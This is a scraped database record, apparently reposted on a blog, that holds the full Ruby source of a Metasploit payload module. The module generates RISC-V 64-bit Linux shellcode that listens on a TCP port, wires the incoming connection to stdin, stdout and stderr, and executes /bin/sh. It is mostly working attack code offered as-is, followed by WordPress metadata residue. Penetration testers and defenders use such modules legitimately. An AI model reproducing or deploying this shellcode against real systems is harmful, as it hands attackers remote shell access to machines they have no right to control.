{“lastseen”:”2026-01-05T19:04:51″,”description”:”Listen for a connection and spawn a command shell Module Options msf use payload\/linux\/riscv64le\/shellbindtcp msf payloadshellbindtcp show actions …actions… msf payloadshellbindtcp set ACTION msf payloadshellbindtcp show options …show and set…”,”published”:”2026-01-05T18:59:07″,”modified”:”2026-01-05T18:59:07″,”type”:”metasploit”,”title”:”Linux Command Shell, Bind TCP Inline”,”source”:””,”references”:””,”id”:”MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nmodule MetasploitModule\\n CachedSize = 164\\n\\n include Msf::Payload::Single\\n include Msf::Payload::Linux\\n include Msf::Sessions::CommandShellOptions\\n\\n SYS_SOCKET = 198\\n SYS_BIND = 200\\n SYS_LISTEN = 201\\n SYS_ACCEPT = 202\\n SYS_DUP3 = 24\\n SYS_EXECVE = 221\\n AF_INET = 2\\n SOCK_STREAM = 1\\n IPPROTO_IP = 0\\n\\n def initialize(info = {})\\n super(\\n merge_info(\\n info,\\n ‘Name’ =\\u003e ‘Linux Command Shell, Bind TCP Inline’,\\n ‘Description’ =\\u003e ‘Listen for a connection and spawn a command shell’,\\n ‘Author’ =\\u003e [\\n ‘modexp’, # bind.s execve RISC-V 64-bit shellcode\\n ‘bcoles’, # metasploit\\n ],\\n ‘License’ =\\u003e BSD_LICENSE,\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e [ ARCH_RISCV64LE ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/modexp.wordpress.com\/2022\/05\/02\/shellcode-risc-v-linux\/’],\\n [‘URL’, ‘https:\/\/web.archive.org\/web\/20230326161514\/https:\/\/github.com\/odzhan\/shellcode\/commit\/d3ee25a6ebcdd21a21d0e6eccc979e45c24a9a1d’],\\n ],\\n ‘Handler’ =\\u003e Msf::Handler::BindTcp,\\n ‘Session’ =\\u003e Msf::Sessions::CommandShellUnix\\n )\\n )\\n end\\n\\n # Encode a RISC-V ADDI (Add Immediate) instruction\\n def encode_addi(rd, rs1, imm12)\\n opcode = 0b0010011\\n funct3 = 0b000\\n imm = imm12 \\u0026 0xfff\\n (imm \\u003c\\u003c 20) | (rs1 \\u003c\\u003c 15) | (funct3 \\u003c\\u003c 12) | (rd \\u003c\\u003c 7) | opcode\\n end\\n\\n # Encode a RISC-V LUI (Load Upper Immediate) instruction\\n def encode_lui(rd, imm20)\\n 0b0110111 | ((imm20 \\u0026 0xfffff) \\u003c\\u003c 12) | (rd \\u003c\\u003c 7)\\n end\\n\\n # Encode a RISC-V SLLI (Shift Left Logical Immediate) instruction\\n def encode_slli(rd, rs1, shamt)\\n opcode = 0b0010011\\n funct3 = 0b001\\n funct6 = 0b000000\\n ((funct6 \\u0026 0x3f) \\u003c\\u003c 26) | ((shamt \\u0026 0x3f) \\u003c\\u003c 20) |\\n (rs1 \\u003c\\u003c 15) | (funct3 \\u003c\\u003c 12) | (rd \\u003c\\u003c 7) | opcode\\n end\\n\\n # Encode a RISC-V OR instruction (rd = rs1 OR rs2).\\n def encode_or(rd, rs1, rs2)\\n opcode = 0b0110011\\n funct3 = 0b110\\n funct7 = 0b0000000\\n (funct7 \\u003c\\u003c 25) | (rs2 \\u003c\\u003c 20) | (rs1 \\u003c\\u003c 15) | (funct3 \\u003c\\u003c 12) | (rd \\u003c\\u003c 7) | opcode\\n end\\n\\n # Emit RISC-V instruction words that build an arbitrary 64-bit constant in a chosen register using SLLI+LUI+ADDI\\n # Note: modifies x6 register\\n def load_const_into_reg64(const, rd)\\n raise ArgumentError, \\”Constant ‘#{const}’ is #{const.class}; not Integer\\” unless const.is_a?(Integer)\\n\\n max_const = (1 \\u003c\\u003c 64) – 1\\n\\n raise ArgumentError, \\”Constant #{const} is outside range 0..#{max_const}\\” unless const.between?(0, max_const)\\n\\n # Split into 32\u2011bit halves\\n hi = const \\u003e\\u003e 32\\n lo = const \\u0026 0xFFFF_FFFF\\n\\n # Load high half\\n [\\n *load_const_into_reg32(hi, rd),\\n *encode_slli(rd, rd, 32),\\n *load_const_into_reg32(lo, 6),\\n *encode_or(rd, rd, 6),\\n ]\\n end\\n\\n # Emit RISC-V instruction words that build an arbitrary 32-bit constant in a chosen register using LUI+ADDI.\\n def load_const_into_reg32(const, rd)\\n raise ArgumentError, \\”Constant ‘#{const}’ is #{const.class}; not Integer\\” unless const.is_a?(Integer)\\n\\n max_const = 0xFFFF_FFFF\\n\\n raise ArgumentError, \\”Constant #{const} is outside range 0..#{max_const}\\” unless const.between?(0, max_const)\\n\\n if const \\u003e= -2048 \\u0026\\u0026 const \\u003c= 2047\\n return [encode_addi(rd, 0, const)]\\n end\\n\\n upper = (const + 0x800) \\u003e\\u003e 12\\n low = const \\u0026 0xfff\\n [\\n encode_lui(rd, upper),\\n encode_addi(rd, rd, low)\\n ]\\n end\\n\\n def generate(_opts = {})\\n return super unless datastore[‘LPORT’]\\n\\n lport = datastore[‘LPORT’].to_i\\n sockaddr_word = AF_INET | ([lport].pack(‘n’).unpack1(‘v’) \\u003c\\u003c 16)\\n\\n shellcode = [\\n # prepare stack\\n 0xff010113, # addi sp,sp,-16\\n\\n # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);\\n *load_const_into_reg32(SYS_SOCKET, 17), # li a7,198 # SYS_socket\\n *load_const_into_reg32(IPPROTO_IP, 12), # li a2,0 # IPPROTO_IP\\n *load_const_into_reg32(SOCK_STREAM, 11), # li a1,1 # SOCK_STREAM\\n *load_const_into_reg32(AF_INET, 10), # li a0,2 # AF_INET\\n 0x00000073, # ecall\\n\\n # bind(s, \\u0026sa, sizeof(sa));\\n 0x00050693, # mv a3,a0 # a3 = s\\n *load_const_into_reg32(SYS_BIND, 17), # li a7,200 # SYS_bind\\n *load_const_into_reg32(16, 12), # li a2,16 # sizeof(sockaddr_in)\\n *load_const_into_reg32(sockaddr_word, 11), # li a1,\\u003cpacked\\u003e # sin_family=AF_INET, sin_port=port, sin_addr=INADDR_ANY\\n 0x00b13023, # sd a1,0(sp) # store first 8 bytes (family+port+addr) at stack\\n 0x00013423, # sd 0,8(sp) # sin_zero\\n 0x00010593, # mv a1,sp # a1 = \\u0026sa\\n 0x00000073, # ecall\\n\\n # listen(s, 1);\\n *load_const_into_reg32(SYS_LISTEN, 17), # li a7,201 # SYS_listen\\n 0x00100593, # li a1,1 # backlog = 1\\n 0x00068513, # mv a0,a3 # a0 = s\\n 0x00000073, # ecall\\n\\n # r = accept(s, 0, 0);\\n *load_const_into_reg32(SYS_ACCEPT, 17), # li a7,202 # SYS_accept\\n 0x00000613, # li a2,0 # addrlen = NULL\\n 0x00000593, # li a1,0 # addr = NULL\\n 0x00068513, # mv a0,a3 # a0 = s\\n 0x00000073, # ecall\\n\\n # dup stdin\/stdout\/stderr\\n 0x00050713, # mv a4,a0\\n *load_const_into_reg32(SYS_DUP3, 17), # li a7,24 # SYS_dup3\\n *load_const_into_reg32(3, 11), # li a1,3 # start from STDERR_FILENO + 1 = 3\\n # c_dup:\\n 0x00070513, # mv a0,a4\\n 0xfff58593, # addi a1,a1,-1\\n 0x00000073, # ecall\\n 0xfe059ae3, # bnez a1,100ec \\u003cc_dup\\u003e\\n\\n # execve(\\”\/bin\/sh\\”, NULL, NULL);\\n *load_const_into_reg32(SYS_EXECVE, 17), # SYS_execve\\n 0x34399537, # lui a0,0x34399\\n 0x7b75051b, # addiw a0,a0,1975\\n 0x00c51513, # slli a0,a0,0xc\\n 0x34b50513, # addi a0,a0,843\\n 0x00d51513, # slli a0,a0,0xd\\n 0x22f50513, # addi a0,a0,559\\n 0x00a13023, # sd a0,0(sp)\\n 0x00010513, # mv a0,sp\\n 0x00000073 # ecall\\n ].pack(‘V*’)\\n\\n # align our shellcode to 4 bytes\\n shellcode += \\”\\\\x00\\” while shellcode.bytesize % 4 != 0\\n\\n super.to_s + shellcode\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/payloads\/singles\/linux\/riscv64le\/shell_bind_tcp.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/payload\/linux\/riscv64le\/shell_bind_tcp\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-05T19:04:51″,”description”:”Listen for a connection and spawn a command shell Module Options msf use payload\/linux\/riscv64le\/shellbindtcp msf payloadshellbindtcp show actions …actions… msf payloadshellbindtcp set ACTION msf payloadshellbindtcp…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-34012","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n